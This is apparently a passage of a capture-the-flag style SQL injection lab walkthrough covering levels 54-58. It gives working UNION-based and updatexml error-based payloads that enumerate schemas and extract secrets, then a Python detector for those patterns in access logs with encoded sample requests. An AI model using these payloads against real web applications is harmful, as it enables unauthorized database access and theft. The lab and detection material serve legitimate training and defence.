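54. Dump the data from a random table in the database within 10 attempts; on every reset the challenge generates random table names, column names and table data. The following payload displays normally:
payload: ?id=3'%23
First, look up the database name.
payload: ?id=-3' union select 1,2,database()%23
Next, look up the table name.
payload: /?id=-3' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
Next, look up the column names.
payload: ?id=-3' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ovaql73xm2' %23
View the contents.
payload: ?id=-3' union select sessid,secret_1Z3Z,tryy from challenges.ovaql73xm2 %23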
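55. Testing shows that this level closes the parameter with a parenthesis. Everything else is the same as the previous level.
payload: ?id=-3) union select sessid,secret_1Z3Z,tryy from challenges.ovaql73xm2 %23
56. Testing shows that the closure is a single quote plus a parenthesis.
payload: ?id=-3') union select sessid,secret_1Z3Z,tryy from challenges.ovaql73xm2 %23
57. Double quote; everything else is the same as before.
payload: ?id=-3" union select sessid,secret_1Z3Z,tryy from challenges.ovaql73xm2 %23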
58. Only 5 attempts are allowed now. First get the database name.
payload: ?id=1' and updatexml(1,concat('~',(select database()),'~'),3);%23
Result: challenges
Next, dump the table name.
payload: ?id=1%27%20and%20updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges') ),1);%23
Result: lbocfsf9yp
Get the column names.
payload: ?id=0' or updatexml(1,(select (concat(1,(select group_concat(column_name) from information_schema.columns where table_name='lbocfsf9yp'))) from information_schema.tables limit 0,1),1)%23
Dump the data.
payload: ?id=0' or updatexml(1,(select (select concat(1,secret_S4XE) from challenges.lbocfsf9yp limit 0,1) from information_schema.tables limit 0,1),1)%23
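A detection sketch for the request patterns used in levels 54-58, added here as an example (not code from the original post or from the challenge project): it percent-decodes the id parameter in access-log lines and flags UNION SELECT, information_schema enumeration, updatexml() calls, and a quote or parenthesis closure followed by a trailing # comment. The log lines, paths and addresses are constructed, and the names INDICATORS, classify and scan are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Indicators drawn from the payloads quoted in levels 54-58.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "updatexml_error": re.compile(r"\bupdatexml\s*\(", re.I),
    # A quote or parenthesis closure, then the rest of the query commented out.
    "closure_then_comment": re.compile(r"['\")].*#\s*$", re.S),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return the sorted indicator names matching one decoded parameter value."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(value))

def scan(log_lines, param="id"):
    """Return [(line_number, hits)] for requests whose `param` matches an indicator."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qsl percent-decodes, so %23 becomes '#' and %27 becomes "'".
        for key, value in parse_qsl(query, keep_blank_values=True):
            hits = classify(value) if key == param else []
            if hits:
                findings.append((n, hits))
    return findings

# Constructed access-log lines; /level54/ and 192.0.2.10 are placeholders.
P = '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET '
SAMPLE_LOG = [
    P + '/level54/?id=3 HTTP/1.1" 200 512',
    P + '/level54/?id=3%27%23 HTTP/1.1" 200 512',
    P + '/level54/?id=-3%27%20union%20select%201,2,database()%23 HTTP/1.1" 200 530',
    P + '/level54/?id=-3%27%20union%20select%201,2,group_concat(table_name)'
        '%20from%20information_schema.tables%20%23 HTTP/1.1" 200 540',
    P + '/level58/?id=1%27%20and%20updatexml(1,concat(1,(select%20database())),1)%23'
        ' HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(n, ", ".join(hits))
```

Pattern matching of this kind only surfaces attempts in logs; the fix for every closure style in levels 54-57 is binding id as a query parameter instead of concatenating it into the SQL string.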
59.